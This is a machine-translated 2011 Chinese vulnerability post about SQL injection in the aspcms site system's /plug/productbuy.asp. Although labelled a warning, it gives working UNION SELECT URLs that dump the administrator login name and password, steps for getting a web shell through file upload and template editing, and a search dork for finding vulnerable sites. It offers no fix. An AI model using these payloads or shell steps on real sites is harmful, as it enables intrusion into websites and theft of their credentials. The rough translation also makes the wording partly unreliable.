aspcms Station system injection 0day-vulnerability warning-the black bar safety net

2011-09-08T00:00:00
ID MYHACK58:62201131804
Type myhack58
Reporter 佚名
Modified 2011-09-08T00:00:00

Description

aspcms development of the new core open source enterprise built Station system, capable of enterprise a variety of site requirements, and

Support template customization, support, extensions, etc., can be completed in a short time the enterprise built Station.

Vulnerability file:/plug/productbuy. asp

The received parameter id is not filtered and the resulting injection vulnerability

After the injection of the pages jump so fast, it is recommended to use the shortcut copy

Explosion user name EXP:

http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7+from+AspCms_User+where+userid=1 This is the explosion of ID=1, account name, and if found insufficient privileges can back test 2,3,4........... Explosion password

http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7+from+AspCms_User+where+userid=1 Backstage login address:/admin/login. asp

Background get the shell

1, Direct upload. asp;x

2, The system configuration information

3, template management New 1. asp template, the content is written mA content.

Search keywords: search keywords: intitle:Powered by AspCms2